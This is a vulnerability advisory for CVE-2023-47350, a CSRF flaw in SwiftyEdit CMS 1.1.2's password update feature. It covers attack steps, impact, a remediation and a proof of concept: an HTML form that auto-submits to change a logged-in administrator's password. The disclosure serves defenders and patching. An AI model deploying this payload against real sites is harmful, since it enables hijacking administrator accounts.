Mechaneus Security Research and Bug Hunting

View on GitHub

CVE-2023-47350: Cross-Site Request Forgery (CSRF) vulnerability in the user passwoprd update funcionality in SwiftyEdit CMS v1.1.2

https://github.com/SwiftyEdit/SwiftyEdit

Vulnerability Type

CWE-352: Cross-Site Request Forgery (CSRF)

CVSS 8.8 HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

The web application does not employ CSRF tokens to secure its ‘Update Password’ functionality in the user ‘Profile’. This vulnerability allows threat actors to execute unauthorized password changes on user accounts, particularly when targeting administrators.

Execution steps

  1. The threat actor crafts a malicious link or HTML markup that, when interacted with by the target admin, initiates a password change request on the admin’s account. This link or HTML can be disguised as a seemingly harmless request, such as a notification or update.
  2. The admin, unaware of the malicious intent, clicks the link or interacts with the HTML markup.
  3. As the admin is logged into the web application, their browser sends a request to change their password to the web application’s server, just as it would for a legitimate password change.
  4. The web application processes the request, changing the admin’s password to a new one chosen by the attacker.
  5. The attacker now has unauthorized access to the admin’s account, potentially leading to data theft, privilege escalation, or other malicious actions.

Impact

This Cross-Site Request Forgery vulnerability in SwiftyEdit CMS 1.1.2 may allow an unauthenticated threat actor to escalate his privileges to administrator. A malicious user can lure an administrator to execute the HTML markup and trigger a change of the administrator’s password to any value he desires. The malicious user can then login as the administrator and create, edit and delete any content in the CMS and edit/delete users with any privilege.

Remediation

Implement and enforce the use of a CSRF token for the ‘Update Password’ functionality in the user ‘Profile’. This token should be generated uniquely for each user session and validated on the server before allowing the action to proceed.

Proof of Concept code

Create an HTML file and add the following markup:

<html>
  <body>
    <form action="http://swiftyedit/profile/" method="POST">
      <input type="hidden" name="s&#95;psw" value="1234" />
      <input type="hidden" name="s&#95;psw&#95;repeat" value="1234" />
      <input type="hidden" name="update&#95;psw&#95;data" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

References